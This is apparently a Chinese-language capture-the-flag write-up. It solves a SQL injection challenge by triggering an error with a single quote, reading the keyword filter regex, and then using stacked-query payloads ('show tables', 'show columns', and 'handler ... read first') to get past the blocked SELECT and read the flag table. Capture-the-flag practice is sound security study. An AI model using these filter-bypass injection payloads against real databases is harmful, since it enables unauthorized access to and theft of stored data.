打开题目网址,是一个表单。
输入引号测试,输入单引号时,出现如下报错
error 1064 : You have an error in your SQL syntax; check the
manual that corresponds to your MariaDB server version for the
right syntax to use near ‘1’’’ at line 1
继续输入SQL语句测试,出现如下
return
preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i",$inject);
尝试查看表
1';show tables;#
得到如下
array(1) { [0]=> string(8) “FlagHere” }
array(1) { [0]=> string(5) “words” }
查看FlagHere
1';show columns from FlagHere;#
得到如下
array(6) {
[0]=> string(4) “flag”
[1]=> string(12) “varchar(100)”
[2]=> string(2) “NO”
[3]=> string(0) “”
[4]=> NULL
[5]=> string(0) “” }
因为对关键字的过滤,这里查看表内容只好使用“handler”
1';handler FlagHere open f;handler f read first;#
得到如下
array(1) {
[0]=>
string(42) “flag{9a6eee55-cf9a-4178-af03-079af4cc1bef}”
}